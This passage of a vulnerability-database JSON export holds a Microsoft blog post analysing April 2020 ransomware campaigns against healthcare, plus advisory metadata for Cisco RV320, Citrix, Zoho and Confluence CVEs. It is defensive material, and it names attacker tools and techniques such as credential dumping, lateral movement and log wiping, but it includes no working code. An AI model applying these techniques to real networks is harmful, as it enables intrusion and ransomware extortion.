Receipt of advisory acknowledged by vendor\r\n2018-10-05 Notified vendor of disclosure date: 2019-01-09\r\n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor\r\n2019-01-16 List of affected versions provided by vendor\r\n2019-01-23 Advisory published\r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html\r\n[2] https://wiki.openssl.org/index.php/Command_Line_Utilities\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests performed by a\r\nteam of specialised IT-security experts. Hereby, security weaknesses in\r\ncompany networks or products are uncovered and can be fixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity-related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at:\r\nhttps://www.redteam-pentesting.de/\r\n\r\nWorking at RedTeam Pentesting\r\n=============================\r\n\r\nRedTeam Pentesting is looking for penetration testers to join our team\r\nin Aachen, Germany. If you are interested please visit:\r\nhttps://www.redteam-pentesting.de/jobs/", "sourceHref": "https://www.exploit-db.com/download/46243", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2020-04-30T23:04:13", "description": "At a time when remote work is becoming universal and the strain on SecOps, especially in healthcare and critical industries, has never been higher, ransomware actors are unrelenting, continuing their normal operations.\n\nMultiple ransomware groups that have been accumulating access and maintaining persistence on target networks for several months activated dozens of ransomware deployments in the first two weeks of April 2020. So far the attacks have affected aid organizations, medical billing companies, manufacturing, transport, government institutions, and educational software providers, showing that these ransomware groups give little regard to the critical services they impact, global crisis notwithstanding. These attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.\n\nThe ransomware deployments in this two-week period appear to cause a slight uptick in the volume of ransomware attacks. However, Microsoft security intelligence as well as forensic data from relevant incident response engagements by Microsoft Detection and Response Team (DART) showed that many of the compromises that enabled these attacks occurred earlier. Using an attack pattern typical of [human-operated ransomware](<https://aka.ms/human-operated-ransomware>) campaigns, attackers have compromised target networks for several months beginning earlier this year and have been waiting to monetize their attacks by deploying ransomware when they would see the most financial gain.\n\nMany of these attacks started with the exploitation of vulnerable internet-facing network devices; others used brute force to compromise RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n![diagram showing different attack stages and techniques in each stage that various ransomware groups use](https://www.microsoft.com/security/blog/wp-content/uploads/2020/04/human-operated-ransomware-payloads-blog-4.png)\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-28T16:00:49", "type": "mssecure", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "modified": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:40:23", "description": "A remote code execution vulnerability exists in Zoho ManageEngine Desktop Central. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-08T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine Remote Code Execution (CVE-2020-10189)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-08T00:00:00", "id": "CPAI-2020-0118", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:22:10", "description": "A remote code execution vulnerability exists in the Widget Connector component of Atlassian Confluence and Data Center. A remote attacker can exploit this issue by sending a specially crafted packet to the target server. Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-04-14T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence and Data Center Remote Code Execution (CVE-2019-3396)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2019-04-16T00:00:00", "id": "CPAI-2019-0506", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:20:22", "description": "An information disclosure vulnerability exists in Cisco RV320 and RV325 Routers. Successful exploitation of this vulnerability would allow remote attackers to gain access to sensitive information and gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-08-05T00:00:00", "type": "checkpoint_advisories", "title": "Cisco RV320 and RV325 Routers Information Disclosure (CVE-2019-1653)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1653"], "modified": "2019-08-12T00:00:00", "id": "CPAI-2019-0076", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:17:58", "description": "A directory traversal vulnerability exists in multiple Citrix products. Successful exploitation of this vulnerability could allow an attacker to retrieve or view arbitrary files from the affected server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-09T00:00:00", "type": "checkpoint_advisories", "title": "Citrix Multiple Products Directory Traversal (CVE-2019-19781)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-26T00:00:00", "id": "CPAI-2019-1653", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:24:12", "description": "A command injection vulnerability exists in Cisco RV320 and RV325 routers. An attacker can exploit this vulnerability by sending an authenticated HTTP request to the web-based management interface. An attacker could then gain the ability to arbitrarily execute code on the machine.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-01-27T00:00:00", "type": "checkpoint_advisories", "title": "Cisco RV320 Command Injection (CVE-2019-1652)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 